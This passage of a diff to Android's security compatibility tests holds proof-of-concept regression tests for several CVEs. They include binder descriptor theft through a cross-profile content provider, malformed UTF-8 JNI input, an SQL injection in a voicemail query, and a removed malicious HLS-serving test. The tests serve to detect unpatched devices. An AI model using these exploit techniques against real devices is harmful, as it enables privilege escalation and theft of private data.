register_android_security_cts_MMapExecutableTest(JNIEnv* env); extern int register_android_security_cts_EncryptionTest(JNIEnv* env); +extern int register_android_security_cts_cve_2021_0394(JNIEnv* env); jint JNI_OnLoad(JavaVM *vm, void *) { JNIEnv *env = NULL; @@ -46,5 +47,9 @@ jint JNI_OnLoad(JavaVM *vm, void *) { return JNI_ERR; } + if (register_android_security_cts_cve_2021_0394(env)) { + return JNI_ERR; + } + return JNI_VERSION_1_4; } diff --git a/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp b/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp new file mode 100644 index 00000000000..66b57925f93 --- /dev/null +++ b/tests/tests/security/jni/android_security_cts_cve_2021_0394.cpp @@ -0,0 +1,51 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <jni.h> +#include <string.h> + +static constexpr char kDefaultValue = 'x'; +static constexpr size_t kStringLength = 4096; + +jboolean android_security_cts_cve_2021_0394_poc(JNIEnv* env, jobject thiz) { + (void) thiz; + char array[kStringLength]; + memset(array, kDefaultValue, kStringLength - 1); + array[kStringLength - 1] = 0; + jstring s = env->NewStringUTF(array); + jboolean isVulnerable = false; + char invalidChars[] = { '\xc0', '\xe0', '\xf0' }; + for (int c = 0; c < sizeof(invalidChars) / sizeof(char); ++c) { + char invalid = invalidChars[c]; + array[kStringLength - 2] = invalid; + s = env->NewStringUTF(array); + const char* UTFChars = env->GetStringUTFChars(s, nullptr); + if (UTFChars[kStringLength - 2] != '?') { + isVulnerable = true; + } + env->ReleaseStringUTFChars(s, UTFChars); + } + return isVulnerable; +} + +static JNINativeMethod gMethods[] = { { "poc", "()Z", + (void*) android_security_cts_cve_2021_0394_poc }, }; + +int register_android_security_cts_cve_2021_0394(JNIEnv* env) { + jclass clazz = env->FindClass("android/security/cts/CVE_2021_0394"); + return env->RegisterNatives(clazz, gMethods, + sizeof(gMethods) / sizeof(JNINativeMethod)); +} diff --git a/tests/tests/security/res/raw/cve_2018_13925.ts b/tests/tests/security/res/raw/cve_2018_13925.ts Binary files differnew file mode 100644 index 00000000000..53656252aaf --- /dev/null +++ b/tests/tests/security/res/raw/cve_2018_13925.ts diff --git a/tests/tests/security/res/raw/cve_2019_2245.ts b/tests/tests/security/res/raw/cve_2019_2245.ts Binary files differnew file mode 100644 index 00000000000..4952466c6bc --- /dev/null +++ b/tests/tests/security/res/raw/cve_2019_2245.ts diff --git a/tests/tests/security/res/xml/device_admin.xml b/tests/tests/security/res/xml/device_admin.xml new file mode 100644 index 00000000000..5760898fa30 --- /dev/null +++ b/tests/tests/security/res/xml/device_admin.xml @@ -0,0 +1,14 @@ +<?xml version ="1.0" encoding ="utf-8"?> +<device-admin> + <uses-policies> +<!-- <limit-password/>--> +<!-- <watch-login/>--> +<!-- <reset-password/>--> +<!-- <force-lock/>--> +<!-- <wipe-data/>--> +<!-- <expire-password/>--> +<!-- <encrypted-storage/>--> +<!-- <disable-camera/>--> +<!-- <disable-keyguard-features/>--> + </uses-policies> +</device-admin> diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java new file mode 100644 index 00000000000..d0b6cad3084 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/BadProvider.java @@ -0,0 +1,76 @@ +package android.security.cts.CVE_2021_0327; + +import android.content.ContentProvider; +import android.content.ContentValues; +import android.database.Cursor; +import android.net.Uri; +import android.os.Bundle; +import android.os.ParcelFileDescriptor; +import android.os.Process; +import android.os.RemoteException; +import android.system.ErrnoException; +import android.system.Os; + +import java.io.IOException; + +public class BadProvider extends ContentProvider { + @Override + public boolean onCreate() { + return true; + } + + @Override + public Bundle call(String method, String arg, Bundle extras) { + if ("get_aidl".equals(method)) { + Bundle bundle = new Bundle(); + bundle.putBinder("a", new IBadProvider.Stub() { + @Override + public ParcelFileDescriptor takeBinder() throws RemoteException { + for (int i = 0; i < 100; i++) { + try { + String name = Os.readlink("/proc/" + Process.myPid() + "/fd/" + i); + // Log.v("TAKEBINDER", "fd=" + i + " path=" + name); + if (name.startsWith("/dev/") && name.endsWith("/binder")) { + return ParcelFileDescriptor.fromFd(i); + } + } catch (ErrnoException | IOException e) { + } + } + return null; + } + + @Override + public void exit() throws RemoteException { + System.exit(0); + } + }); + return bundle; + } + return super.call(method, arg, extras); + } + + @Override + public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) { + return null; + } + + @Override + public String getType(Uri uri) { + return null; + } + + @Override + public Uri insert(Uri uri, ContentValues values) { + return null; + } + + @Override + public int delete(Uri uri, String selection, String[] selectionArgs) { + return 0; + } + + @Override + public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) { + return 0; + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java new file mode 100644 index 00000000000..56408ee0c94 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/CVE_2021_0327.java @@ -0,0 +1,81 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_0327; + +import android.app.Activity; +import android.content.Context; +import android.content.Intent; +import android.platform.test.annotations.SecurityTest; +import android.test.AndroidTestCase; +import android.util.Log; +import androidx.test.runner.AndroidJUnit4; +import androidx.test.InstrumentationRegistry; +import org.junit.Test; +import org.junit.runner.RunWith; +import static org.junit.Assert.assertFalse; +import static org.junit.Assert.assertTrue; + +@SecurityTest +@RunWith(AndroidJUnit4.class) +public class CVE_2021_0327 { + + private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts"; + private static final String TAG = "CVE_2021_0327"; + public static boolean testActivityRequested; + public static boolean testActivityCreated; + public static String errorMessage = null; + + private void launchActivity(Class<? extends Activity> clazz) { + final Context context = InstrumentationRegistry.getInstrumentation().getContext(); + final Intent intent = new Intent(Intent.ACTION_MAIN); + intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName()); + intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + context.startActivity(intent); + } + + /** + * b/175817081 + */ + @Test + @SecurityTest + public void testPocCVE_2021_0327() throws Exception { + Log.d(TAG, "test start"); + testActivityCreated=false; + testActivityRequested=false; + launchActivity(IntroActivity.class); + synchronized(CVE_2021_0327.class){ + if(!testActivityRequested) { + Log.d(TAG, "test is waiting for TestActivity to be requested to run"); + CVE_2021_0327.class.wait(); + Log.d(TAG, "got signal"); + } + } + synchronized(CVE_2021_0327.class){ + if(!testActivityCreated) { + Log.d(TAG, "test is waiting for TestActivity to run"); + CVE_2021_0327.class.wait(10000); + Log.d(TAG, "got signal"); + } + } + Log.d(TAG, "test completed. testActivityCreated=" + testActivityCreated); + if(errorMessage != null){ + Log.d(TAG, "errorMessage=" + errorMessage); + } + assertTrue(errorMessage==null); + assertFalse(testActivityCreated); + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java new file mode 100644 index 00000000000..fd2af3a8da1 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/IntroActivity.java @@ -0,0 +1,129 @@ +package android.security.cts.CVE_2021_0327; + +import android.app.Activity; +import android.app.AlertDialog; +import android.app.admin.DevicePolicyManager; +import android.content.ClipData; +import android.content.ComponentName; +import android.content.Intent; +import android.net.Uri; +import android.os.Bundle; +import android.view.View; +import android.util.Log; +import android.os.SystemClock; + +//import android.support.test.InstrumentationRegistry; +import androidx.test.InstrumentationRegistry; +import android.support.test.uiautomator.UiDevice; +import android.support.test.uiautomator.UiObject2; +import android.support.test.uiautomator.By; +import android.support.test.uiautomator.BySelector; +import java.io.*; +import java.util.stream.Collectors; + +import android.security.cts.CVE_2021_0327.workprofilesetup.AdminReceiver; + +public class IntroActivity extends Activity { + + private static final int AR_WORK_PROFILE_SETUP = 1; + private static final String TAG = "CVE_2021_0327"; + + private void launchOtherUserActivity() { + Log.d(TAG,"launchOtherUserActivity()"); + Intent intent = new Intent(this, OtherUserActivity.class); + intent.setClipData(new ClipData("d", new String[]{"a/b"}, new ClipData.Item(Uri.parse("content://android.security.cts.CVE_2021_0327.BadProvider")))); + intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION); + startActivity(intent); + finish(); + } + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + Log.d(TAG,"IntroActivity.OnCreate()"); + if (isProfileOwner()) { + } else if (canLaunchOtherUserActivity()) { + launchOtherUserActivity(); + } else { + setupWorkProfile(null); + + //detect buttons to click + boolean profileSetUp=false; + String button; + java.util.List<UiObject2> objects; + UiDevice mUiDevice = UiDevice.getInstance(InstrumentationRegistry.getInstrumentation()); + BySelector selector = By.clickable(true); + + + while(!profileSetUp){ + do { + Log.i(TAG, "waiting for clickable"); + SystemClock.sleep(3000); + } while((objects = mUiDevice.findObjects(selector)).size()==0); + for(UiObject2 o : objects){ + button=o.getText(); + Log.d(TAG,"button:" + button); + + if(button==null){ + continue; + } + + switch(button){ + case "Delete" : + o.click(); + Log.i(TAG, "clicked: Delete"); + break; + case "Accept & continue" : + o.click(); + Log.i(TAG, "clicked: Accept & continue"); + break; + case "Next" : + o.click(); + profileSetUp=true; + Log.i(TAG, "clicked: Next"); + break; + default : + continue; + } + break; + } + } + //end while(!profileSetUp); + } + } + + private boolean isProfileOwner() { + return getSystemService(DevicePolicyManager.class).isProfileOwnerApp(getPackageName()); + } + + private boolean canLaunchOtherUserActivity() { + Intent intent = new Intent("android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY"); + return (getPackageManager().resolveActivity(intent, 0) != null); + } + + public void setupWorkProfile(View view) { + Log.d(TAG, "setupWorkProfile()"); + Intent intent = new Intent(DevicePolicyManager.ACTION_PROVISION_MANAGED_PROFILE); + intent.putExtra( + DevicePolicyManager.EXTRA_PROVISIONING_DEVICE_ADMIN_COMPONENT_NAME, + new ComponentName(this, AdminReceiver.class) + ); + startActivityForResult(intent, AR_WORK_PROFILE_SETUP); + } + + @Override + protected void onActivityResult(int requestCode, int resultCode, Intent data) { + Log.d(TAG, "onActivityResult()"); + if (requestCode == AR_WORK_PROFILE_SETUP) { + if (resultCode == RESULT_OK) { + launchOtherUserActivity(); + } else { + new AlertDialog.Builder(this) + .setMessage("Work profile setup failed") + .setPositiveButton("ok", null) + .show(); + } + } + super.onActivityResult(requestCode, resultCode, data); + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java new file mode 100644 index 00000000000..3ed38dee35f --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/OtherUserActivity.java @@ -0,0 +1,94 @@ +package android.security.cts.CVE_2021_0327; + +import android.annotation.SuppressLint; +import android.app.Activity; +import android.app.AlertDialog; +import android.net.Uri; +import android.os.AsyncTask; +import android.os.Bundle; +import android.os.Handler; +import android.os.IBinder; +import android.os.ParcelFileDescriptor; +import android.os.ResultReceiver; +import android.view.View; +import android.util.Log; +import java.io.File; +import java.io.FileDescriptor; +import java.io.*; +import java.util.stream.Collectors; +import java.util.concurrent.TimeUnit; +import android.os.SystemClock; + +public class OtherUserActivity extends Activity { + + static ParcelFileDescriptor sTakenBinder; + private static final String TAG = "CVE_2021_0327"; + String errorMessage = null; + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + doMakeProviderBad(null); + SystemClock.sleep(5000); + doStuff(null); + } + + public void doMakeProviderBad(View view) { + new MakeProviderBad().execute(); + } + + private class MakeProviderBad extends AsyncTask<Void, Void, Exception> { + + @Override + protected Exception doInBackground(Void... voids) { + try { + if (sTakenBinder != null) { + sTakenBinder.close(); + sTakenBinder = null; + } + + Uri uri = getIntent().getClipData().getItemAt(0).getUri(); + Bundle callResult = getContentResolver().call(uri, "get_aidl", null, null); + IBadProvider iface = IBadProvider.Stub.asInterface(callResult.getBinder("a")); + sTakenBinder = iface.takeBinder(); + if (sTakenBinder == null) { + throw new Exception("Failed to find binder of provider"); + } + iface.exit(); + } catch (Exception e) { + errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString(); + } + + return null; + } + + @Override + protected void onPostExecute(Exception e) { + } + } + + public void doStuff(View view) { + sendCommand("start", "--user", "0", "-d", "content://android.security.cts.CVE_2021_0327.BadProvider", "-n", "android.security.cts/.CVE_2021_0327.TestActivity"); + } + + @SuppressLint("PrivateApi") + void sendCommand(String... args) { + String[] command = new String[args.length + 2]; + command[0] = "/system/bin/cmd"; + command[1] = "activity"; + System.arraycopy(args, 0, command, 2, args.length); + + try{ + Runtime.getRuntime().exec(command); + } catch(Exception e){ + errorMessage = errorMessage==null ? e.toString() : errorMessage + ", " + e.toString(); + } + finally{ + synchronized(CVE_2021_0327.class){ + CVE_2021_0327.testActivityRequested=true; + CVE_2021_0327.errorMessage = errorMessage; + CVE_2021_0327.class.notifyAll(); + } + } + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java new file mode 100644 index 00000000000..d44a220ec9d --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/TestActivity.java @@ -0,0 +1,17 @@ +package android.security.cts.CVE_2021_0327; + +import android.app.Activity; +import android.os.Bundle; +import android.util.Log; + +public class TestActivity extends Activity { + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + Log.d("CVE_2021_0327","TestActivity.onCreate()"); + synchronized(CVE_2021_0327.class){ + CVE_2021_0327.testActivityCreated=true; + CVE_2021_0327.class.notifyAll(); + } + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java new file mode 100644 index 00000000000..d374dfd2edf --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/AdminReceiver.java @@ -0,0 +1,7 @@ +package android.security.cts.CVE_2021_0327.workprofilesetup; + +import android.app.admin.DeviceAdminReceiver; + +public class AdminReceiver extends DeviceAdminReceiver { + +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java new file mode 100644 index 00000000000..1ae1c5dba4e --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0327/workprofilesetup/ProvisionedActivity.java @@ -0,0 +1,43 @@ +package android.security.cts.CVE_2021_0327.workprofilesetup; + +import android.app.Activity; +import android.app.admin.DevicePolicyManager; +import android.content.ComponentName; +import android.content.Intent; +import android.content.IntentFilter; +import android.content.pm.PackageManager; +import android.os.Bundle; + +import android.security.cts.CVE_2021_0327.OtherUserActivity; + +public class ProvisionedActivity extends Activity { + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + + getPackageManager().setComponentEnabledSetting( + new ComponentName( + this, + OtherUserActivity.class + ), + PackageManager.COMPONENT_ENABLED_STATE_ENABLED, + PackageManager.DONT_KILL_APP + ); + + DevicePolicyManager manager = getSystemService(DevicePolicyManager.class); + //IntentFilter intentFilter = new IntentFilter("com.example.clearedshell.OTHER_USER_ACTIVITY"); + IntentFilter intentFilter = new IntentFilter("android.security.cts.CVE_2021_0327.OTHER_USER_ACTIVITY"); + //IntentFilter intentFilter = new IntentFilter("android.security.cts.CVE_2021_0327$OTHER_USER_ACTIVITY"); + intentFilter.addCategory(Intent.CATEGORY_DEFAULT); + ComponentName admin = new ComponentName(this, AdminReceiver.class); + manager.addCrossProfileIntentFilter( + admin, + intentFilter, + DevicePolicyManager.FLAG_MANAGED_CAN_ACCESS_PARENT + ); + manager.setProfileEnabled(admin); + + setResult(RESULT_OK); + finish(); + } +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java index 5ace5df5f08..a59d749772c 100644 --- a/tests/tests/security/src/android/security/cts/CVE_2021_0339.java +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0339.java @@ -17,98 +17,126 @@ package android.security.cts; import static org.junit.Assert.assertThat; -import static org.hamcrest.Matchers.lessThan; +import static org.junit.Assume.assumeThat; +import static org.hamcrest.Matchers.*; -import android.test.AndroidTestCase; import android.app.Activity; import android.content.Context; import android.content.Intent; -import android.platform.test.annotations.SecurityTest; +import android.os.Bundle; +import android.os.RemoteCallback; import android.os.SystemClock; +import android.platform.test.annotations.SecurityTest; +import android.test.AndroidTestCase; +import android.util.Log; import androidx.test.InstrumentationRegistry; import androidx.test.runner.AndroidJUnit4; -import android.util.Log; import org.junit.Test; import org.junit.runner.RunWith; +import java.util.concurrent.CompletableFuture; +import java.util.concurrent.TimeUnit; + @SecurityTest @RunWith(AndroidJUnit4.class) public class CVE_2021_0339 { static final String TAG = CVE_2021_0339.class.getSimpleName(); private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts"; + private static final String CALLBACK_KEY = "testactivitycallback"; + private static final String RESULT_KEY = "testactivityresult"; + static final int DURATION_RESULT_CODE = 1; static final int MAX_TRANSITION_DURATION_MS = 3000; // internal max static final int TIME_MEASUREMENT_DELAY_MS = 5000; // tolerance for lag. - public static boolean testCompleted; - - public FirstActivity fActivity; - public SecondActivity sActivity; - private void launchActivity(Class<? extends Activity> clazz) { + private void launchActivity(Class<? extends Activity> clazz, RemoteCallback cb) { final Context context = InstrumentationRegistry.getInstrumentation().getContext(); final Intent intent = new Intent(Intent.ACTION_MAIN); intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName()); intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + intent.putExtra(CALLBACK_KEY, cb); context.startActivity(intent); } /** * b/175817167 + * start the first activity and get the result from the remote callback */ @Test @SecurityTest public void testPocCVE_2021_0339() throws Exception { + CompletableFuture<Integer> callbackReturn = new CompletableFuture<>(); + RemoteCallback cb = new RemoteCallback((Bundle result) -> + callbackReturn.complete(result.getInt(RESULT_KEY))); + launchActivity(FirstActivity.class, cb); // start activity with callback as intent extra - Log.d(TAG, "test start"); - testCompleted = false; - launchActivity(FirstActivity.class); + // blocking while the remotecallback is unset + int duration = callbackReturn.get(15, TimeUnit.SECONDS); - //wait for SecondActivity animation to complete - synchronized(CVE_2021_0339.class){ - if(!testCompleted) - CVE_2021_0339.class.wait(); - } - Log.d(TAG, "test completed"); - - //A duration of a transition from "FirstActivity" to "Second Activity" - //is set in this test to 10 seconds - // (res/anim/translate1.xml and res/anim/translate2.xml) - //The fix is supposed to limit the duration to 3000 ms. - // testing for > 8s - assertThat(SecondActivity.duration, - lessThan(MAX_TRANSITION_DURATION_MS + TIME_MEASUREMENT_DELAY_MS)); + // if we couldn't get the duration of secondactivity in firstactivity, the default is -1 + assumeThat(duration, not(equals(-1))); + + // the max duration after the fix is 3 seconds. + // we check to see that the total duration was less than 8 seconds after accounting for lag + assertThat(duration, + lessThan(MAX_TRANSITION_DURATION_MS + TIME_MEASUREMENT_DELAY_MS)); } + /** + * create an activity so that the second activity has something to animate from + * start the second activity and get the result + * return the result from the second activity in the remotecallback + */ public static class FirstActivity extends Activity { + private RemoteCallback cb; - @Override - public void onEnterAnimationComplete() { - super.onEnterAnimationComplete(); - Intent intent = new Intent(this, SecondActivity.class); - intent.putExtra("STARTED_TIMESTAMP", SystemClock.uptimeMillis()); - startActivity(intent); - overridePendingTransition(R.anim.translate2,R.anim.translate1); - Log.d(TAG,this.getLocalClassName()+" onEnterAnimationComplete()"); - } + @Override + public void onCreate(Bundle bundle) { + super.onCreate(bundle); + cb = (RemoteCallback) getIntent().getExtras().get(CALLBACK_KEY); + } + + @Override + public void onEnterAnimationComplete() { + super.onEnterAnimationComplete(); + Intent intent = new Intent(this, SecondActivity.class); + intent.putExtra("STARTED_TIMESTAMP", SystemClock.uptimeMillis()); + startActivityForResult(intent, DURATION_RESULT_CODE); + overridePendingTransition(R.anim.translate2,R.anim.translate1); + Log.d(TAG,this.getLocalClassName()+" onEnterAnimationComplete()"); + } + + @Override + protected void onActivityResult(int requestCode,int resultCode, Intent data) { + super.onActivityResult(requestCode, resultCode, data); + if (requestCode == DURATION_RESULT_CODE && resultCode == RESULT_OK) { + // this is the result that we requested + int duration = data.getIntExtra("duration", -1); // get result from secondactivity + Bundle res = new Bundle(); + res.putInt(RESULT_KEY, duration); + finish(); + cb.sendResult(res); // update callback in test + } + } } + /** + * measure time since secondactivity start to secondactivity animation complete + * return the duration in the result + */ public static class SecondActivity extends Activity{ - public static int duration = 0; - - @Override - public void onEnterAnimationComplete() { - super.onEnterAnimationComplete(); - long completedTs = SystemClock.uptimeMillis(); - long startedTs = getIntent().getLongExtra("STARTED_TIMESTAMP", 0); - duration = (int)(completedTs - startedTs); - Log.d(TAG, this.getLocalClassName() - + " onEnterAnimationComplete() duration=" + Long.toString(duration)); - - //Notify main thread that the test is completed - synchronized(CVE_2021_0339.class){ - CVE_2021_0339.testCompleted = true; - CVE_2021_0339.class.notifyAll(); + @Override + public void onEnterAnimationComplete() { + super.onEnterAnimationComplete(); + long completedTs = SystemClock.uptimeMillis(); + long startedTs = getIntent().getLongExtra("STARTED_TIMESTAMP", 0); + int duration = (int)(completedTs - startedTs); + Log.d(TAG, this.getLocalClassName() + + " onEnterAnimationComplete() duration=" + Long.toString(duration)); + Intent durationIntent = new Intent(); + durationIntent.putExtra("duration", duration); + setResult(RESULT_OK, durationIntent); // set result for firstactivity + finish(); // firstactivity only gets the result when we finish } - } } } diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0394.java b/tests/tests/security/src/android/security/cts/CVE_2021_0394.java new file mode 100644 index 00000000000..d3278ee1252 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/CVE_2021_0394.java @@ -0,0 +1,42 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import static org.junit.Assert.assertFalse; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import androidx.test.runner.AndroidJUnit4; + +@RunWith(AndroidJUnit4.class) +public class CVE_2021_0394 { + static { + System.loadLibrary("ctssecurity_jni"); + } + + /** + * b/172655291 + */ + @SecurityTest(minPatchLevel = "2021-03") + @Test + public void testPocCVE_2021_0394() throws Exception { + assertFalse(poc()); + } + + public static native boolean poc(); +} diff --git a/tests/tests/security/src/android/security/cts/CertificateData.java b/tests/tests/security/src/android/security/cts/CertificateData.java index 0b4780f9702..118b40fb0d9 100644 --- a/tests/tests/security/src/android/security/cts/CertificateData.java +++ b/tests/tests/security/src/android/security/cts/CertificateData.java @@ -17,14 +17,12 @@ */ package android.security.cts; -import android.platform.test.annotations.SecurityTest; /** * Run "./cts/tools/utils/java-cert-list-generator.sh > * cts/tests/tests/security/src/android/security/cts/CertificateData.java" * to generate this file. */ -@SecurityTest class CertificateData { static final String[] CERTIFICATE_DATA = { "91:C6:D6:EE:3E:8A:C8:63:84:E5:48:C2:99:29:5C:75:6C:81:7B:81", diff --git a/tests/tests/security/src/android/security/cts/CertificateTest.java b/tests/tests/security/src/android/security/cts/CertificateTest.java index 2d889889f98..7b1ed9dacb8 100644 --- a/tests/tests/security/src/android/security/cts/CertificateTest.java +++ b/tests/tests/security/src/android/security/cts/CertificateTest.java @@ -20,7 +20,6 @@ import java.io.File; import java.io.FileInputStream; import java.io.IOException; import android.content.pm.PackageManager; -import android.platform.test.annotations.SecurityTest; import android.test.AndroidTestCase; import java.security.KeyStore; import java.security.KeyStoreException; @@ -37,7 +36,6 @@ import java.util.HashSet; import java.util.List; import java.util.Set; -@SecurityTest public class CertificateTest extends AndroidTestCase { // The directory for CA root certificates trusted by WFA (WiFi Alliance) private static final String DIR_OF_CACERTS_FOR_WFA = diff --git a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java index 3aec3942631..c5234d614f6 100644 --- a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java +++ b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java @@ -148,7 +148,10 @@ public class PackageSignatureTest extends AndroidTestCase { "com.android.apex.cts.shim", // Oom Catcher package to prevent tests from ooming device. - "com.android.cts.oomcatcher" + "com.android.cts.oomcatcher", + + // Collects device info at the start of the test + "com.android.compatibility.common.deviceinfo" )); diff --git a/tests/tests/security/src/android/security/cts/SQLiteTest.java b/tests/tests/security/src/android/security/cts/SQLiteTest.java new file mode 100644 index 00000000000..47407ca6222 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/SQLiteTest.java @@ -0,0 +1,81 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.content.Context; +import android.content.ContentResolver; +import android.content.Intent; +import android.content.pm.PackageManager.NameNotFoundException; +import android.net.Uri; +import android.platform.test.annotations.SecurityTest; +import android.provider.VoicemailContract; +import android.test.AndroidTestCase; +import androidx.test.InstrumentationRegistry; +import static org.junit.Assert.*; + +@SecurityTest +public class SQLiteTest extends AndroidTestCase { + + private ContentResolver mResolver; + private String mPackageName; + private Context mContext; + + @Override + protected void setUp() throws Exception { + super.setUp(); + mResolver = getContext().getContentResolver(); + mContext = InstrumentationRegistry.getTargetContext(); + mPackageName = mContext.getPackageName(); + } + + /** + * b/139186193 + */ + @SecurityTest(minPatchLevel = "2019-11") + public void test_android_cve_2019_2195() { + Uri uri = VoicemailContract.Voicemails.CONTENT_URI; + uri = uri.buildUpon().appendQueryParameter("source_package", mPackageName).build(); + + try { + mContext.grantUriPermission(mPackageName, uri, + Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION + | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION); + } catch (Exception e) { + if (e instanceof java.lang.SecurityException) { + // this suggests com.android.providers.contacts.VoicemailContentProvider + // does not allow granting of Uri permissions, hence return. + return; + } + } + + try { + String fileToDump = mContext.createPackageContext("com.android.providers.contacts", 0) + .getDatabasePath("contacts2.db").getAbsolutePath(); + try { + mResolver.query(uri, null, null, null, + "_id ASC LIMIT _TOKENIZE('calls(_data,_data,_data,source_package,type) VALUES(''" + + fileToDump + "'',?,?,''" + mPackageName + "'',4);',0,'','Z')") + .close(); + fail("Vulnerable function exists"); + } catch (android.database.sqlite.SQLiteException e) { + // do nothing + } + } catch (NameNotFoundException n) { + // do nothing + } + } +} diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java index 949d4ced1fc..a2d5ccd9cab 100644 --- a/tests/tests/security/src/android/security/cts/StagefrightTest.java +++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java @@ -1146,91 +1146,6 @@ public class StagefrightTest { @Test @SecurityTest(minPatchLevel = "2018-04") - public void testStagefright_cve_2017_13279() throws Exception { - Thread server = new Thread() { - @Override - public void run(){ - try (ServerSocket serverSocket = new ServerSocket(8080) { - {setSoTimeout(10_000);} // time out after 10 seconds - }; - Socket conn = serverSocket.accept() - ) { - OutputStream stream = conn.getOutputStream(); - byte http[] = ("HTTP/1.0 200 OK\r\nContent-Type: application/x-mpegURL\r\n\r\n" - + "#EXTM3U\n#EXT-X-STREAM-INF:\n").getBytes(); - stream.write(http); - while(!conn.isClosed()) - stream.write(("a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n" - + 